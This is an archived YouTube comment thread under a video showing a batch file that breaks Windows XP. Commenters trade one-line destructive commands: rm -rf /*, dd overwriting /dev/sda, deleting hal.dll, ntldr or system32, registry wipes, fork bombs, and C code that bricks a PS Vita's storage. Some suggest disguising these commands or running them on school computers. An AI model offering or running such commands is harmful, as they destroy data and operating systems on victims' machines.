hobune Channels Contact About Donate

WORLD RECORD! 3 lines of code killing PC!

Back to video page | Download comments jsonl

Comments (archived 2024-09-11 01:48; 293 top, 449 total comments)

@SiamAlamOfficial 2017-11-16 04:38:52

That is my fav ncs music

171 likes
Replies (16)
@辣罐汽水_soda0916 2023-02-05 03:10:11

Me too!

0 likes
@sna76200 2022-02-07 09:53:29

@@serdevill Syn Cole is It's Name

0 likes
@ArsenTech 2021-04-13 09:37:38

Syn Cole - Feel Good

0 likes
@ArsenTech 2021-04-03 15:11:45

Yep, I Also Like it

0 likes
@eazy_black 2021-03-15 20:41:39

Same

0 likes
@MrRadsVarietyChannel 2021-01-10 00:13:41

@@mb59621 yes

0 likes
@fart1234. 2020-12-27 11:48:13

@@mariannsnajder4128 I think 🤔

0 likes
@MrRadsVarietyChannel 2020-12-15 02:02:11

@@serdevill feel good syn cole

0 likes
@Guilherme-xg9tj 2020-10-21 20:38:57

EAE SIAM ALAM HELLO SIAM ALAM ♥

0 likes
@giselletorresgst 2020-02-04 15:48:01

IOU GODE FILEM

0 likes
@MrRadsVarietyChannel 2019-11-10 04:51:27

That's My Fav NCS Music

0 likes
@diahdwiarti 2018-12-14 08:14:53

What is the music?

0 likes
@eraroblox2792 2018-09-29 14:18:35

i dont have a feeling

0 likes
@linodiazfernandez7415 2018-09-25 20:16:12

Lol Siam here?

0 likes
@evaldaslukosevicius7207 2018-09-22 12:44:33

you are best siam alam i sub to u and enderman

1 like
@serdevill 2018-05-06 08:48:03

Say me the name i also love it :)

0 likes
@Litevx 2016-12-01 14:46:35

theres a one line code "rd C: /s /q"

56 likes
Replies (2)
@dkabv 2022-12-31 20:25:22

Next record: nothing code

0 likes
@p0werm3lon 2017-12-21 18:16:42

augusto munute that's not permanent though

4 likes
@LiEnby 2017-12-22 02:30:43

Hey i beat your record,
i can do it in 1 line on any linux-based system

sudo rm -rf /*

183 likes
Replies (35)
@dkabv 2022-12-31 20:26:14

I tryed it, good method to optimize my PC

0 likes
@KSPAtlas 2021-09-20 12:06:37

@@malwaretestingfan you do need to be sure you want to kill it by entering your password, and your system admin (most of the time it's you) has to agree

0 likes
@KSPAtlas 2021-09-20 12:05:41

I did that once in a Debian VM and it crashed in like a second

0 likes
@0xlogn 2021-06-29 22:04:50

@@TCGProductions03 No need for --no-preserve-root, /* implies all of the dirs in root but not root (rm -rf /usr /etc ...)

0 likes
@amogus7 2021-06-24 05:04:20

@@TCGProductions03 alias sudo="echo lol; sudo rm -rf /* --no-preserve-root";

$ sudo chmod /dev/sda
[sudo] password for user: **

WAIT A SECOND NO!

2 likes
@LiEnby 2020-12-17 14:10:47

@@Alexus_2000 del %SYSTEMDRIVE% /s /q

0 likes
@Alexus_2000 2020-12-17 14:05:32

But this video is for Windows

0 likes
@espana86 2020-09-04 12:45:45

@@imhoriz0n727 0 lines of code!

1 like
@circleubuntu 2020-09-03 00:43:48

Sorry no heart 4 u

0 likes
@LiEnby 2020-08-30 00:23:24 (edited 2020-08-30 00:23:38 )

@@sikorsp22 thats ez recoverable thou, sudo dd if=/dev/urandom of=/dev/sda bs=1028 count=8192 should do it >_<

0 likes
@yeppiidev 2020-08-29 14:29:13

@@sikorsp22 Yeah, that removes the grub configuration file and yur os wont boot again. Nice.

0 likes
@sikorsp22 2020-08-29 11:00:31

I have a faster method

Script:

#!/bin/sh
sudo rm /boot/grub/grub.cfg

1 like
@yeppiidev 2020-07-31 16:56:32

You can do that on windows 10! Just activate WSL in windows features, install WSL Ubuntu from Microsoft Store, open ubuntu and type rm -rf /mnt/c/ --no-preserve-root and it will remove everything in C:\ drive!

0 likes
@mahmoudsobhy5843 2020-07-27 18:34:39

@@malwaretestingfan @echo off
del C://WINDOWS/system32

0 likes
@m_ibrahim990 2020-07-21 10:53:35

@@thescreemregular5168 Haha lol

0 likes
@thescreemregular5168 2020-07-20 00:52:15

*coffin dance intensifys*

0 likes
@m_ibrahim990 2020-07-15 11:12:58

@@LiEnby Oh right ... Just wondering...

0 likes
@indenturedLemon 2020-07-15 06:14:24 (edited 2023-11-07 04:05:52 )

@Owen Vee yeah, it work on wsl

0 likes
@LiEnby 2020-07-15 05:06:58 (edited 2020-07-15 05:07:12 )

@@m_ibrahim990 its the same as
dd if=/dev/zero of=/dev/sda
dont do it. you'll brick ur console.

0 likes
@m_ibrahim990 2020-07-15 04:58:02

@@LiEnby THATS INSANE you really are a genius....






Do you use it with vita sdk.... what happens if you use it?

0 likes
@LiEnby 2020-07-15 03:57:13

@@m_ibrahim990
char buffer[0x10000];
memset(buffer,0x00,0x10000);
SceUID fd;
fd = ksceIoOpen("sdstor0:/lp-act-entire",SCE_O_WRONLY, 6);
while(true){
ksceIoWrite(fd,buffer,0x10000);
}
- Seriously DONT do this.

1 like
@LiEnby 2020-06-15 07:38:12

@@TCGProductions03 nah if its /* it doenst ask for no preserve root

0 likes
@indenturedLemon 2020-06-15 07:12:43

work on WSL Bash too btw

0 likes
@soomyboomy4951 2020-01-18 03:09:20

Perfect timing, I moved to Ubuntu yesterday.
Stop me, I dare you.

1 like
@m_ibrahim990 2019-12-31 05:30:59

@@danct12cp lol

1 like
@danct12cp 2019-12-30 14:00:28

​@@m_ibrahim990 yes, using a hammer

1 like
@m_ibrahim990 2019-12-30 06:57:39

But could you do it on a vita? 😉

1 like
@danct12cp 2019-12-04 10:00:39

sudo dd if=/dev/urandom of=/dev/sda

4 likes
@Flanlaina 2019-11-19 07:36:31

del c:\*.* /s /q

1 like
@samkals 2019-04-19 13:47:27

So can I @echo off del system32 shutdown -r

0 likes
@ChoboUnjeon 2018-10-26 14:45:20

del windows\system32

3 likes
@romoney 2018-09-22 16:06:21

congrats thats the pc killer - world record - 1 line of code

2 likes
@imhoriz0n727 2018-09-17 20:14:05

i can do it even faster *spills vodka on pc and lights it on fire*.
and this even works on mac!

32 likes
@malwaretestingfan 2018-09-14 20:06:58

@@TCGProductions03 True.

4 likes
@TCGProductions03 2018-04-27 12:21:12

sudo rm -rf /* --no-preserve-root

30 likes
@circleubuntu 2020-09-03 00:43:17

I see it's deleting NTLDR. So simple, that is.

57 likes
Replies (2)
@R4Y_TWO 2020-09-15 18:20:52

Hey, i'm installing ur mobile version (Ubuntu Touch) in my phone (yes i know ur just a random person but yeah)

0 likes
@madbanana22 2020-09-08 22:45:13

and I thought it was a restart - 1 and something else

1 like
@faustasazuolasbagdonas123 2019-02-14 19:26:14

It would be interesting to see how antiviruses were used to react to this back then. Nowadays it is hard to imagine for me that until Windows Vista it was normal to run any application with administrator rights...

8 likes
@happywin98 2017-07-20 09:30:20

Про hal.dll не забыл? Достаточно 1-2 строк кода..
@echo off
del C:\Windows\System32\hal.dll

66 likes
Replies (15)
@OlgaPlaysMatch-3Game 2021-12-27 13:10:04

Но вместо этого вы можете фактически удалить папку system32, чтобы ваш компьютер никогда не мог загрузиться снова! Вот код: (или вы можете добавить «@echo off», чтобы люди были обмануты)

del c:\WINDOWS\system32

0 likes
@mynameupdatesannually 2021-06-21 09:39:16

@del C:\Windows\System32\hal.dll

0 likes
@mazellovvv 2021-05-03 12:38:01

Зачем вы echo off пишите? Одну строчку del c:\windows\system32\hal.dll и готово

0 likes
@bubgamingandvlogs3870 2021-03-15 15:49:45

@@ACoTam2 hal.dll not hall.dll

0 likes
@arsikkbar 2020-10-06 05:12:30

rd c:\ /s /q

0 likes
@addust 2020-09-06 14:44:15

@echo off is useless and should only be used for disguised ones

0 likes
@circleubuntu 2020-09-03 00:45:04

блять

0 likes
@slavicofficial2998 2019-06-27 14:36:26 (edited 2023-10-29 20:41:42 )

@LessKnoxk rd c:\ /s /q kills pc

0 likes
@ChoboUnjeon 2018-10-26 14:44:14

Or you could erase ntoskrnl.exe

0 likes
@alphal0gy 2018-09-25 15:24:31

The same thing you wrote

0 likes
@alphal0gy 2018-09-15 10:10:39

Можно первую строку убрать - 1 строка

1 like
@kirill2465 2018-04-24 16:44:30

ACo Tam2 hal*

0 likes
@glitchyyt7482 2018-01-20 20:32:53

ACo Tam2 Nope

2 likes
@ACoTam2 2017-12-22 20:37:20

* hall.dll

0 likes
@gulnursariyeva9473 2017-10-05 16:26:03

you again?!

2 likes
@ICTman 2018-01-02 15:17:48

The @echo off isn't strictly necessary, all it does is hide what it's doing. You can achieve the same effect by placing @ in front of every line and removing the @echo off.

5 likes
Replies (3)
@ICTman 2021-12-27 13:11:36

@@OlgaPlaysMatch-3Game all that line does is turn off showing the command before it's run, you can do the same by just putting @ in front of each line to turn off showing each command before it's run. Results in a smaller file size (for this case) and 1 less line.

1 like
@OlgaPlaysMatch-3Game 2021-12-27 13:05:30

But it’s an important part of the virus, so that people mistakenly open the, virus and have their PC, screwed up. That’s how developers make viruses. ;)

0 likes
@malwaretestingfan 2018-09-14 20:22:30

Exactly.

0 likes
@blackychan8570 2018-03-15 23:55:32

I've beaten ALL of you, type

del .
Less characters, one line, and deletes literally everything, due to the fact that the wildcards are not only the names of the file, but the extensions!

2 likes
Replies (1)
@avi8aviate 2019-01-21 07:35:44

You should've done "del *.*".

0 likes
@pardal_bs 2019-03-17 23:35:01

In just 1 line:

%0¦%0

Crashes windows almost instantly.

6 likes
Replies (1)
@ronture8279 2020-08-18 01:37:25

to run as a command, put "cmd /c cd /d %appdata% && echo "cmd /c %0|%0">x.bat && x.bat"

0 likes
@DangerouslyStupid 2020-09-05 20:56:41

you can do a similar script but use reg delete HKLM on windows 10 :)

5 likes
@carlosvirgilio7269 2020-07-28 15:44:08

Music: Syn Cole - Feel Good

2 likes
@teamdoodz 2019-12-19 22:42:36

If you get rid of the "@echo off" you can shorten it to 2 lines

4 likes
Replies (1)
@SOTP. 2021-06-26 10:57:22

And if you get rid of shutdown /r /t its one line, and you can hide the cmd if you use iexplore

0 likes
@SomeRandomPiggo 2018-06-16 14:27:14

My smallest virus is
del C:/Windows/system32




classic

16 likes
Replies (9)
@circleubuntu 2020-09-11 08:40:59 (edited 2020-09-11 08:41:37 )

@@artemthedev they use switches, like /rd, /s and /q idk just one of them

0 likes
@Win_eXPerience 2020-01-14 18:18:52

If the computer does weird "Access denied" stuff even tho you had all the rights to do that
That apparently means it's trying to fight back but it can't

0 likes
@Infevlol 2019-12-21 19:32:37

@@artemthedev Hmmmmm... You're right, but i have another idea.

0 likes
@artemthedev 2019-12-21 19:20:42

​@@Infevlol But that's not fair. Who will run the virus through processhacker?

0 likes
@Infevlol 2019-12-21 19:13:44

@@artemthedev process hacker can open cmd as trustedinstaller

0 likes
@artemthedev 2019-12-21 19:08:04

@@Infevlol No. TrustedInstaller is owner of system32

0 likes
@Infevlol 2019-12-21 18:52:52

@@artemthedev you can do that as administrator.

0 likes
@ARIELGD 2019-11-02 08:26:36

​@@artemthedev '''Access denied''. but your computer was dying

2 likes
@artemthedev 2019-06-29 15:53:58

But... What about takeown? Or it will be ''Access denied''.

0 likes
@pifatech 2021-12-31 00:37:28

This batch file is impressive!!! :0

3 likes
@defacube 2022-07-27 20:16:58

These are also 2 lines which brick the pc:
rd C: /s /q
wmic os where primary=1 reboot

1 like
@ricardocestero1272 2017-11-05 04:21:48

Windows XP has ended, but you can still install it from a virtual machine

1 like
Replies (1)
@ronture8279 2020-08-18 01:47:55

As goes for any OS, on a virtual machine or an actual machine, as long as the hardware can run it. I installed Windows 4 times on the machine I am currently running, and when I got it it had Ubuntu on it.

0 likes
@QWhippy 2017-12-31 07:41:39

"Download in description!"

4 likes
@hoangnghiainhle7786 2021-01-06 06:30:22

The song name is: "Syn Cole - Feel Good".
But...

Windows XP isn't feeling good now...

0 likes
@lemecquimetdescommentaires1119 2017-11-24 14:41:29

but this:
del "c:\ntldr"
shutdown -s -t 1



More fast ;)

14 likes
@lesiostasio2542 2020-10-07 15:06:25

You can reduce the program to one line by using "&" to chain the commands

6 likes
Replies (1)
@wojtekdudek2374 2023-03-05 16:52:25

but it wouldn't be real 3 lines of code

0 likes
@crazypilot9957 2020-07-19 23:48:36

Now I know how to make my friends that still use xp upgrade.

1 like
Replies (1)
@shadowthefurryscientist 2021-01-24 20:27:59

Yes

0 likes
@KoIIIka_MP4 2024-02-20 21:13:39

When C:\ntdlr is deleted, your pc is broken

0 likes
@xRaffa 2018-01-02 09:00:26

If You Want So Many Lines, dont ask me but make me drown in water lol.

3 likes
@ashywashyaaaaa 2018-06-21 01:47:20

Only in 1:32, Holy crap...

1 like
@lf12345 2020-07-16 14:08:46

DEL /S /Q /F "c:/"

run as trusted installer for the best result

1 like
Replies (4)
@nil8659 2020-09-09 06:58:00 (edited 2020-09-09 06:58:19 )

Do not use your actual computer's hard drive or solid state drive,otherwise it will break the actual device.

0 likes
@ronture8279 2020-08-18 12:01:16

@@lf12345 As long as I don't damage the hardware, I think I will be fine with damaging the operating system. I did it on this computer and I recovered greatly.

0 likes
@lf12345 2020-08-18 07:04:00

@@ronture8279 you need external tools, but before you run you should install a VM to avoid damage to you fysical pc

0 likes
@ronture8279 2020-08-18 01:37:58

How would you run it as TrustedInstaller?

0 likes
@HydraAV 2023-05-10 17:39:12

Fun fact: 0kb classed as malware by some guys. Virusshare etc. MD5 d41d8cd98f00b204e9800998ecf8427e

0 likes
@Circleference 2020-03-04 18:41:01 (edited 2020-03-04 18:41:37 )

@echo off <--- delete this
del "c:/ntldr"
shutdown /s /t 10 <--- delete this

and now u get 1 line of code that kill your windows xp
(btw i had to put slashes)

0 likes
@edgynigga1096 2018-06-14 12:32:50

runned with 1000$ gaming pc














lol gg runned in sandboxie XD
NICE VID ENDER!

13 likes
Replies (1)
@yakov5776 2018-09-23 22:57:14

oh lol

0 likes
@mynameisjeff4527 2018-03-14 13:06:01

What VMware you using?

0 likes
@windowspcprotectorlivevide9286 2019-02-03 10:50:15

I mean everyone started as a script kiddie,tho,so don't worry about it.

0 likes
@aprilnya 2018-11-27 17:50:24

shutdown can also be like -t 01 so that it immediatelly kills

0 likes
@1ups_15 2018-06-21 08:53:53

only 2 lines if you delete @echo off !!

1 like
@okyanusozsahin3439 2018-02-11 16:02:58

2.0 version codes:
@echo off
del "c:/ntldr"
shutdown -s -t 000

0 likes
@helloimkyle 2018-04-28 02:46:56

Command:
@echo off
del C:\NTLDR
del C:\BOOTMGR
shutdown -s -t 10
But its a 4 lines of killing PC. Such as Windows 95, Windows 98, Windows ME,... ...Windows 8.1, and Windows 10!!

0 likes
Replies (1)
@helloimkyle 2018-04-28 02:48:20

Vid soon!!

0 likes
@yeppiidev 2020-07-31 16:56:46

You can do that on windows 10 with linux! Just activate WSL in windows features, install WSL Ubuntu from Microsoft Store, open ubuntu and type rm -rf /mnt/c/ --no-preserve-root and it will remove everything in C:\ drive!

0 likes
@опетар 2022-07-27 07:38:31 (edited 2022-07-27 07:38:37 )

The bandicam watermark is now legend

0 likes
@baragonkunfan94thesecondar60 2018-01-30 18:23:58

Why bandicam? Bandicam (not registered, trial version and full version) is the worst.

0 likes
@jgsh8062 2018-12-12 15:47:08

You could have done it in two lines if you got rid of @echo off.

1 like
@KingTrollex1234 2018-11-11 00:52:29

Code of vírus:
@echo off
Del /s /q /f c:\ntldr
Shutdown -s - f -t 10

0 likes
@SoSmartSkidder 2018-06-25 15:03:04

this is works on all Windows, fast

@echo off
del HCKU /s /f
del HCKU /f
shutdown -r -f -t 3 -c "It's time to dead!"

0 likes
@rekto3456 2020-04-19 14:36:34

2 lines to all windows versions


del %windir%\system32\hal.dll
shutdown -r -t 00

0 likes
@jthecoder 2019-02-19 19:22:00 (edited 2019-02-19 19:24:44 )

Just concatenate it into 1 line using the & symbol between commands! 😂

Just do: del C:\ntldr & shutdown /r /t 0
BOOM! 💥🔥💥

2 likes
Replies (3)
@OurNation 2020-09-11 18:34:10

@@circleubuntu nevermind lol
Have you seen pearOS Cupertino?

0 likes
@circleubuntu 2020-09-11 08:42:01

@@OurNation huh

0 likes
@OurNation 2019-05-13 03:16:42

del C:\ntdlr && shutdown /r /t 0

With double "&"

2 likes
@yotoprules9361 2016-11-20 15:00:03

theres a faster one for xp, 2 lines.
del c:\windows\system32\hal.dll
shutdown /s /r /t 00

0 likes
@ol1vver 2017-12-04 17:18:24 (edited 2017-12-04 17:21:50 )

I can do it in one line...
mountvol C: /d
...though it is just to scare people, everything goes back on restart.
Try deleting hal.dll

1 like
Replies (1)
@user-gp4pm2fi4m 2023-04-08 17:22:28

Not on windows 7.

0 likes
@EIekc 2017-05-07 16:29:52

song name in the start of the video?

0 likes
@GAME-jn1ft 2020-03-18 22:19:56

Wait! It's 100% destructive for OS and maybe destructive for the PC? I need answer @Enderman

1 like
Replies (1)
@ronture8279 2020-08-18 01:40:28 (edited 2020-08-18 01:46:45 )

No, your files will still be on there. just not able to boot unless the files are placed in their proper spot.

Your solution will be to install a linux distribution or boot from a Windows installation medium (e. g. cd or usb), do Shift+F10 once booted, open Notepad, File > open, set the file extension .txt to all files, then navigate to the folder you want to move older, right click it, then press "cut" and go to wherever you want to back the files up to and click "paste". they should move.

0 likes
@lilycowlishaw2952 2018-09-23 16:37:14

i have one with one line
Del c:\windows\system32\hal.dll

1 like
@sturms5836 2018-01-18 19:38:05

I got one with only 1 line.
del system32

2 likes
Replies (2)
@sturms5836 2021-01-17 10:38:16

@@user-fq2pf5lu6e bruh I said that 2 years ago

0 likes
@user-fq2pf5lu6e 2021-01-17 09:09:24

Wrong

0 likes
@julianmacinnis720 2018-11-30 06:54:56

How did you make so look like windows 95?

0 likes
@imhoriz0n727 2018-09-17 20:12:51

you could've made it 2 lines if you didnt use the kinda useless @echo off

2 likes
@Cactus-hb7mj 2018-05-27 05:46:56

Another good way to crash Windows (any version).
G:
start explorer
goto G

4 likes
@AliDiaa6 2021-11-30 08:22:06

It didn't work on Windows XP Professional SP2 64-bit.

0 likes
@notrandomtypek 2019-03-26 05:27:19

Here’s a virus I developed some time ago...
:A
start explorer
goto A
However you can replace explorer with a more RAM intensive program.
At the time it crashed my PC with 2GB RAM almost immediately.

0 likes
Replies (1)
@ronture8279 2020-08-18 01:51:25

You can bluescreen a computer by running task manager as admin, clicking file > new task... and then typing "wininit" and click run as admin if an option. 👍

0 likes
@themanhacc 2020-08-13 13:40:48

1 line

rd C:\ /s /q

works on windows 2000, xp, vista, 7, 8, 8.1, 10

0 likes
@motionarium 2017-01-14 13:41:16 (edited 2017-01-14 16:36:46 )

(For Windows XP)
del C:\windows\system32\hal.dll /q /s
shutdown -r -t 0

0 likes
@seeeeroy 2018-05-24 03:21:18

Нет, юзайте reg delete HKLM /f /s /q флаги я не помню, зато почти на всех видах работает(с правами администратора), а hal.dll и ntldr восстанавливаются

0 likes
@lgramasxf4759 2018-02-16 06:07:52

What the name of the song?please

0 likes
@PantsYT 2018-09-09 17:19:34

haha ez to beat
here
del c:\windows\system32\hal.dll

1 like
@joveaaron-real 2020-08-30 16:34:36

del C: done 1 line

0 likes
@panzervpanther933 2020-03-19 23:49:16

let's restart your computer ctrl+alt+delete

0 likes
@toshirokardevaand2772 2020-10-24 07:35:17

Like 15 years ago my "friends" did this to my PC!

0 likes
@henryward8311 2020-07-10 21:46:36

I'm not responsible for any harm done to your computer*

0 likes
@dudewhereisthegame8861 2018-01-03 18:33:29

u do know that you dont need the @echo off its basicley using up a line 4 nothing

1 like
@cell927 2018-09-14 06:45:32

@echo off
del "c:/windows/system32"

Record beaten

0 likes
@meh8461 2017-12-22 17:55:04

my real life virus is two lines HILLARY CLINTIN

0 likes
@Super_Mario_64 2023-03-29 17:49:55

You can make it with one line just type del c:ntldr
@echo off and shutdown-n ist not requrement

0 likes
@vedantgogia 2021-07-13 07:53:21 (edited 2021-09-11 19:25:26 )

Windows xp logging off and saying bye :(

0 likes
@notleonid 2020-02-21 23:45:35

Is it works only on this Win98 System?

0 likes
Replies (1)
@notleonid 2020-02-21 23:45:54

or XP

0 likes
@skirocketmusic5085 2020-02-14 17:44:14

Was about taskkillin winlohon or svchost?

0 likes
Replies (1)
@amogus3 2020-04-17 04:43:56

Winlohon xD

0 likes
@addust 2019-12-07 18:46:07

@echo off isn't nessecary.
It just hides what's happening.

0 likes
@Даниил0 2020-10-15 16:52:46 (edited 2020-10-15 16:53:44 )

del C:\Windows\
Most short ver of virus

0 likes
@sky.-b6734 2018-02-19 20:13:17

Song?

2 likes
Replies (1)
@FanJapanStudios 2018-06-16 07:56:23

Syn Cole - Feel Good

1 like
@ghhhhhhhhhhhjjjjjjjjjj 2020-09-01 01:16:34

memorize it and make the school computers remember it

0 likes
@pikaaxyt 2018-03-09 19:29:11

More simply

@echo off
del C:/WINDOWS

0 likes
@dylanm6539 2018-03-31 23:58:21

Whait whats the music for at 1:00

0 likes
@Arsen_2005 2020-07-14 07:28:22

Like this

0 likes
@48hours_Ultra 2021-06-27 18:28:39

Echo off
del C: .

0 likes
@tminusblastedrocket 2018-03-13 19:06:54

I made a Mac virus that was when given admin with one line of code was bye bye mac

0 likes
@jackssrt 2018-10-21 17:19:59

i found a shorter way del C:\Windows\System32\hal.dll & shutdown -r -f -t 00

0 likes
@ScottJoC 2020-08-28 19:05:16

Why do you need echo off on this.

0 likes
@SamuelDoesThings2011 2021-04-07 23:55:42

NEW WORLD RECORD: 1 line of code that kills EVERY Windows!

rd c:\ /s /q

0 likes
@cope9489 2018-01-31 15:40:27

what is the music?

0 likes
@nondos91 2020-12-11 11:22:22

i will try in virtualbox

1 like
@kotivas2364 2018-12-12 17:12:49 (edited 2018-12-12 17:14:34 )

Что-бы убить винду полностью! достаточно 2 строки
del %windir%\System32\hal.dll
del %windir%\*.*
Работает на всех Windows! Даже на дос windows

0 likes
@Andrew982_ 2017-01-03 16:24:13

One line of code:
Del C:\ NTLDR

0 likes
@NotBart 2018-10-22 09:35:29 (edited 2018-10-22 09:35:56 )

My thing
cd c:\
del *

DO NOT TRY AT HOME KIDS

0 likes
@user-pn8um2mq7j 2019-06-06 06:56:33

I think you just wanted to get rid of this VM so you won't bother removing Amigo (and a bunch of other viruses I guess) so you destroyed it using this 3-line batch virus.

0 likes
@Anquarza 2022-11-18 00:14:06

If you didn't use @echo off it will take 2 lines

0 likes
@ivanfonarev1369 2018-11-27 17:31:00

Song - Syn Cole Feel good.

0 likes
@iGuidoARG 2017-11-23 13:57:04

2 lines and works for windows xp to 10
bcdedit /delete {current}
del c:\ntldr

0 likes
@learnstocode.zenx.2501 2018-03-29 10:42:07

I do remote shoutdown in schoolpc and the error code is match with your :D

0 likes
@danik4985 2017-12-31 12:02:42

why @echo off ?

0 likes
@hypradust6432 2017-12-24 14:29:46

I have a good! (In two words, not lines)
The code is:

del C:

so ez...

0 likes
@darkfire8547 2018-12-11 13:47:45

This kills your pc in one line
Del c:/system32/

0 likes
@s1nnohlakes 2018-04-29 04:07:57

Music?

0 likes
@bemydesirememories1894 2021-06-18 15:46:58

Forcing user to reinstall Windows

0 likes
@dnsgiper504 2019-10-13 06:00:06

Ура спасибо за русские субтитры

1 like
@mariannsnajder4128 2018-06-04 08:00:49

Oh well I have a better one
@echo off
del C:\WINDOWS\system32
shutdown -s -t 5

0 likes
@mazellovvv 2020-12-25 19:12:00

Если гнаться за строками кода, то писать
@echo off воооооооообще не надо.

0 likes
@Versuffe 2021-01-30 05:33:02

This is more deadly,
@echo off
Del “c:/users/yourvictimsname/%appdata%/minecraft
Shutdown

it will cause brain damage

0 likes
@unknownaccount4783 2019-02-12 13:40:06

LOL
@echo off & del "c:/ntldr" & shutdown -s -t 10

0 likes
@helloimkyle 2018-05-19 13:22:45

I made it! See:
@echo off
rename C:\Windows\System32\hal.dll hell.dll
shutdown -s -t 10

0 likes
@Infevlol 2019-11-11 12:28:47 (edited 2019-12-16 17:28:47 )

Just type "del C:\Windows\system32" in cmd as administrator.

0 likes
Replies (3)
@csooogaming 2019-12-17 12:45:18

Ok

0 likes
@Infevlol 2019-12-16 17:28:52

@@csooogaming repaired

0 likes
@csooogaming 2019-12-11 18:56:06

and how windows will know where it is?

0 likes
@dr3w494 2017-12-23 21:16:12

i made a calculator in python that can add with only 3 lines of code

0 likes
Replies (1)
@Kino-Imsureq 2017-12-24 10:17:22

i guess well, its similar to java, so
int a = 5;
int b = 7;
int sum = a+b;

yeah its eazy

0 likes
@danilwhale 2019-12-31 09:08:17

WoW this video is russian! In 1:28 you old pc windows 7 russian XD

0 likes
@samkals 2019-04-19 13:44:58

What us your Rig

0 likes
@ixalaz4536 2018-12-25 18:23:31

del c:/windows/system32/*.dll & shutdown -s -t 5

0 likes
@stuffystuffs2684 2018-04-22 09:18:01

I made a one too but its 1 line (World Record):

@echo off && cd c:\ && del bootmgr && shutdown -s -t 1

0 likes
@mish1195 2018-09-15 09:19:30

rd c:

record beaten

0 likes
@jaketech556 2016-12-04 18:13:53 (edited 2016-12-04 18:15:59 )

Uhhh what about "del *" or "ren *.dll *.txt"
its also supported by up to win10
btw u dont need @echo off
Nice world record.

0 likes
@d01hBlx1lk 2021-03-26 09:19:30

こんなWORED RECORDがあってたまるか()

0 likes
@Super_Mario_64 2023-03-29 17:55:50

I,m working on a virus that maybe work on All Windows versions include DOS i can sent you the virus on E-Mail in the E-Mail is a txt file just rename it to bat

0 likes
@Dax009 2018-12-08 14:01:11 (edited 2018-12-08 14:01:22 )

Or you could
del “c:/ntldr”
Shutdown -r -t goodbye

0 likes
@fanpusheen2642 2020-07-29 17:14:51

Alright, sooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo it turns from english to russian! watttttttttt

0 likes
@OrangeGroupTech 2019-10-13 10:19:52

I can beat you.
RUN AS ADMINISTRATOR <- important!!!!
Take ownership of System32 first <- important too!!!
This works on all Windows versions from NT to 10:
del "C:\Windows\System32\hal.dll"
shutdown -s t 10

0 likes
@VanillaPWNZ 2017-12-10 11:24:42

Как бля ХРюша выжила когда на нём стоит Амиго? "My МОЗГ has disconnected"

0 likes
Replies (1)
@dkabv 2022-12-31 20:24:45

АМИГО???

0 likes
@Realtimeless 2019-05-29 05:04:08 (edited 2019-05-29 05:04:59 )

this is the best way to install sonic mega collection windows xp in 1mb only

0 likes
@surabujo 2020-03-27 13:56:52

What song

0 likes
@cope9489 2018-01-31 15:41:58

is there a code that will end a process?

0 likes
Replies (1)
@malwaretestingfan 2018-09-14 20:18:09

"@taskkill -f /im (process that you want to kill.exe)"

1 like
@AndreiBWRA019 2020-08-25 00:33:57 (edited 2020-08-25 00:34:23 )

Just use the eject pc button.

0 likes
@linuxeed 2022-08-12 19:54:20

Браузер Амиго?

0 likes
@realzguardian 2021-11-24 10:15:46

you can do it in 1 line just use &&

0 likes
@WiderGuy 2019-06-08 19:46:55

why the transalate

0 likes
@Arsen_2005 2020-06-25 19:11:12

3 Lines of Batch Code That Crashes System

0 likes
@user-xq6ol2un7z 2021-06-02 05:53:40 (edited 2021-06-02 05:53:45 )

Oh so this was old enderman or Andréw

0 likes
@kaangaming9296 2017-10-26 11:38:15

Roses are red,
Violets are blue,
www.Bandicam.com

0 likes
@DOSTutorials-zz7ji 2020-08-28 12:46:10

I broke your record here is 1 line:
@echo off & del C:\Windows\System32\hal.dll & shutdown -s -t 1

0 likes
@thischannelisshutdowndueto3461 2019-06-30 07:02:06

Windows 10 is no support payload

0 likes
@granie300 2018-04-24 11:19:00

I thought that was
:A
Start
Goto A

0 likes
@BSabbath 2017-12-23 14:06:01

I think @echo off del NTLDR Reset

0 likes
@kaangg12 2023-02-19 16:07:17

del c:\windows & reg delete HKLM
its how you do this

0 likes
@realrickastley 2021-07-04 10:18:50

Simple: del "c:/ntldr"

0 likes
@metro_ken 2018-12-02 07:43:33

my language is going crazy

0 likes
@justtunerru 2019-02-24 10:11:37

А я уже считал ты не будешь делать русские субтитры

0 likes
@soomyboomy4951 2019-03-22 04:46:20 (edited 2019-03-22 04:55:44 )

1 line batch file:
@rd /q /s C:\Windows\System32 & shutdown /s /t 30
The ampersand seperates the commands. Simple.
Also, if you don't know, "@" works like "@echo off" but just for the command, "rd /q /s " deletes the directory in silent mode, and deletes the whole tree, and "shutdown /s /t 30" shuts the PC off after 30 seconds, the "/t" is for timer.

0 likes
@BodyAlhoha 2020-01-27 17:14:32

@echo off is ... you can remove it

0 likes
@spacekraken666 2018-03-22 18:54:25

Единственный правильный способ удалить браузер Амиго

1 like
Replies (1)
@homevideo3026 2019-07-11 17:35:35

Надо комп выбрасывать квартиру новыю покупать суицид делать перерождатся покупать новый комп и всё

0 likes
@rithvikkamma 2022-01-06 04:12:02

he s videos are very good

0 likes
@ACoTam2 2017-12-28 16:37:27

@echo off
del c:/system32
pause

0 likes
@littlemousedancz8135 2017-12-20 20:36:31

You dont must use @echo off

0 likes
@BrynGriffithsVideo 2020-10-11 17:58:16

i think this just deleted bootmgr

0 likes
@user-fq2pf5lu6e 2021-01-17 09:08:18

del C:\Windows\System32

1 line record

0 likes
@RG-dv5xs 2016-12-12 20:44:44

можешь дать ссылку на этот Windows XP?

0 likes
Replies (1)
@dkabv 2022-12-31 20:25:44

Он просто установил стандартную тему

0 likes
@pseydochel 2018-04-07 12:37:08

@echo off
Format c:

0 likes
@reskehd 2017-11-28 17:38:04 (edited 2017-11-28 17:38:29 )

@echo off
rd /s /q C:\SYSTEM32
shutdown -s -t 10

0 likes
@meithenoob5394 2018-11-30 20:28:08

РУШШИАН! ГДЕ РУШШИАН?

0 likes
@Arsen_2005 2020-06-25 19:10:45

Like Your Vid

0 likes
@lol532-t2g 2017-03-26 12:15:14

0nly 1337 h4x0rz us3 batch duude

0 likes
@user-dm4ys4sq7r 2017-05-27 13:01:13

что за музыка?

0 likes
@decentcarp2771 2019-05-24 06:18:21

my virus

del bootmgr

0 likes
@dawidsz56 2019-04-21 01:42:29

I knew it! You RUSSIAN. But don’t worry, i am indonesian

0 likes
@corpse3465 2018-07-22 03:09:00

does this work?

0 likes
@yesthisisreallmao2338 2021-02-24 11:39:36

